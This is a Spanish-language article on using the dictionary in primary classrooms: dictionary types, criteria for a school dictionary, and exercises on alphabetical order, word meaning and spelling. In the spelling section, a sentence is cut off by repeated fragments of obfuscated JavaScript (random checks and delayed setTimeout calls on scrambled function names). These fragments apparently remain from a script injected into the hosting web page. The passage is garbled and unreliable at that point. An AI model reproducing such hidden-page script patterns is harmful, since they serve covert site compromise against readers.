EL DICCIONARIO: UNA HERRAMIENTA IMPRESCINDIBLE EN EL AULA

Autora: Andrea  Álvarez García

  1. ¿Qué es un diccionario?

           Un diccionario es una obra de consulta de palabras o términos recogidos  de forma ordenada, generalmente alfabética. Puede aparecer como libro impreso o en soporte digital y la disciplina que se encarga de confeccionarlos es la lexicografía.


           El Diccionario de la Real Academia Española presenta la siguiente definición de diccionario: “1.  Libro en el que se recogen y explican de forma ordenada voces de una o más lenguas, de una ciencia o de una materia determinada. 2. Catálogo numeroso de noticias importantes de un mismo género, ordenado alfabéticamente. Diccionario bibliográfico, biográfico, geográfico.


           La información que  proporciona un diccionario varía según el tipo de diccionario del que se trate. Algunos de ellos son los siguientes:

  •  Diccionarios generales: donde se explica brevemente el significado de las palabras de una lengua determinada.
  •  Etimológicos: en ellos se especifica el origen de las palabras.
  •  De sinónimos y antónimos: aparecen palabras que significan lo mismo o lo contrario.
  •  Bilingües: las palabras son traducidas a otro idioma.
  •  Especializados: dedicados a palabras o términos que pertenecen a un campo o técnica determinados: naturaleza, informática…
  •  Inversos: están ordenados alfabéticamente según las últimas letras de cada palabra, en vez de las primeras. Su uso principal es buscar palabras que rimen con otra, para la redacción de poesías y versos.

          Esto solo son algunos de los más importantes, sin embargo existen  más: de dudas, ideológicos, diccionarios enciclopédicos…


 


2. Elección del diccionario de aula


             El docente no debe tener una actitud pasiva ante la decisión de los alumnos a traer un diccionario u otro a clase. Tal y como señala Manuel Alvar Ezquerra (1993): “cada etapa de la instrucción del individuo requiere un diccionario distinto, por lo cual las recomendaciones de los profesores son de una importancia primordial […]. El profesor debe conocer seriamente cada una de las obras lexicográficas existentes, o al menos las más importantes para cada periodo de la educación”.


             Las características que debe tener un buen diccionario escolar son las siguientes: 


            – El lenguaje empleado en él debe estar al  alcance del nivel de competencia lingüística de quien lo usa. Las definiciones deben ser comprensibles para el alumno, para que pueda entender el significado de forma autónoma.


             – El prólogo del diccionario también debe ir adaptado al nivel de los alumnos. En algunas ocasiones contienen asuntos de lingüística general o lexicografía que no interesa o no entiende el alumnado.


             – Las abreviaturas y símbolos deberían evitarse, ya que son dificultades añadidas al uso.


             – Es muy útil que aparezcan ilustraciones, pues le ayudan en la comprensión de las definiciones.


             Por otra parte, es aconsejable que todos los alumnos tengan en clase el mismo diccionario, independientemente de que en la biblioteca de aula o en la del colegio tengamos diferentes tipos para que los alumnos los conozcan. Si todos tienen el mismo diccionario, todos dispondrán de la misma información y evitaremos comparar y tener que explicar y escuchar diferentes definiciones y prólogos. Además, el profesor podrá utilizar algunos refuerzos para ayudarlos a buscar (por ejemplo: “la palabra está entre la página 20 y 30”) y, a su vez, el logro de un ejercicio estará más equiparado, pues no habrá alumnos en desventaja por tener una herramienta peor.


 

3. Uso didáctico del diccionario


             El diccionario es una herramienta imprescindible dentro del aula. Su correcto uso llevará a una mejora de la ortografía, ampliará el vocabulario del alumno, servirá para que utilicen palabras con mayor precisión y fomentará su autonomía en el aprendizaje, ya que ellos mismos podrán buscar la palabra que desconocen o que no saben cómo se escribe. Por eso, es muy importante tenerlo presente a la hora de leer en clase, pues el léxico puede presentarse como un obstáculo para la comprensión.


             Por otra parte, a partir del diccionario que utiliza y maneja en el aula, el alumno irá conociendo las convenciones lexicográficas de los mismos y podrá enfrentarse en un futuro a otras obras de consultas u otros tipos de diccionarios.


           Pero, para conseguir todo esto, es necesario enseñar a usarlo, lo que  requiere el abordaje de conceptos y procedimientos específicos, que van desde el conocimiento y memorización del orden alfabético, hasta el saber utilizar autónomamente este texto con todo el abanico de posibilidades que ofrece.


           Al enseñar a usarlo, los niños no deben percibirlo como un libro que sólo se consulta para resolver dudas ortográficas o para buscar el significado de alguna palabra extraña que hemos encontrado en un momento determinado, sino que se deben proponer diversas actividades creativas y lúdicas, capaces de despertar la curiosidad de los alumnos por conocer nuevas palabras o profundizar mejor en aquellas que ya se conocen, que les ayuden a descubrir la rica información que un diccionario contiene y lo útil que su consulta habitual puede resultar para mejorar el uso de la lengua.


           A continuación, abordaré estrategias y actividades para enseñar a usar esta herramienta en el aula: enseñar a utilizarlo, aprender el significado de las palabras y su ortografía correcta.


 3.1. Enseñar a utilizarlo


             Para ello tienen que hacerse con las normas lexicográficas más importantes de su diccionario y tener un buen dominio del abecedario.

             Lo primero es que el niño se familiarice con este libro de consulta. Se le pedirá que lo observe y analice y se le realizarán preguntas para asegurarnos que se fija en todos los aspectos:

  • “¿Encuentras alguna guía donde te explique cómo está estructurada la información?, ¿dónde está: al principio o al final?” y nos pararemos a que los alumnos comprendan este prologo que aparece al principio.
  • “¿Aparecen ilustraciones?, ¿para qué crees que sirven?”
  • “¿Ofrece información gramatical al final?, ¿qué tipo de información es?”
  • “Lee la información que tu diccionario te da sobre dos palabras elegidas al azar y observa si las entiendes con facilidad, si tiene ejemplos de cómo debes usar correctamente esas palabras y si incluye otras informaciones de interés sobre esas palabras”.
  • “¿Están las palabras estructuradas en columnas?”
  •  “¿Para qué nos puede resultar útil un diccionario?”

             Por otra parte, para que el alumno consiga un buen dominio del abecedario y así facilitar la búsqueda, se le propondrán actividades como:

  •  - Elaborar listas de cualquier cosa que se les diga: nombres de animales, nombres de plantas, nombres de los compañeros de clase…
  • - Escribe la letra que iría después en el alfabeto:  d, ___ ; s, ___ ; v, ___
  • - ¿Qué letra faltan para completar el abecedario y dónde se encontraría?

A B C D E F G H I J K L M N Ñ O P Q R S T V W X  Y Z

  • - El profesor le dice una letra y el alumno abre el diccionario aproximadamente por donde él cree que están las palabras que empiezan por dicha letra.

 3.2. Aprender el significado de las palabras


             Uno de los objetivos de los docentes en el aula es que sus alumnos se expresen con precisión. Para ello, es conveniente que utilicen un vocabulario amplio, evitar que se acostumbren a las palabras comodín y hacerles ver la importancia de no confundir significados de palabras parecidas. El diccionario es una herramienta muy útil para conseguir este objetivo. Para ello, tratarán actividades como:


 - Dar un texto y los niños tendrán que subrayar las palabras que no conocen. Primero tendrán que intentar adivinar su significado por su contexto y luego las buscarán en el diccionario para comprobar si es así.


 - Decir si la frase es verdadera o falsa, ayudándose de un diccionario: la hembra del caballo es la caballa, los gatos ladran, los gatos tienen cuatro piernas y las personas cuatro patas


 - Escribir sinónimos de diferentes vocablos.


 3.3. Aprender la ortografía correcta de las palabras.


             El objetivo es que los alumnos puedan resolver dudas sin pasar necesariamente por el profesor. Esto es gratificante para ellos, porque le proporcionará la satisfacción de ser autosuficientes. Hay que insistir en que en el diccionario encontrarán siempre la ortografía correcta de las palabras.


             Ejercicios para fomentar este objetivo, pueden ser:


 -          Escribir la diferencia entre palabras. Por ejemplo: entre poyo y pollo y entre vaca y baca.


 -          Acudir al diccionario para trabajar la ortografía. Por ejemplo, hacerles notar buscandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en la v- que todas las palabras que contengan las sílabas bla, ble, bli, blo, blu se escriben con b.


 -          Trabajar la importancia de una correcta acentuación del español: ayer canté dos canciones. El cante fue muy bonito.


 


FUENTES: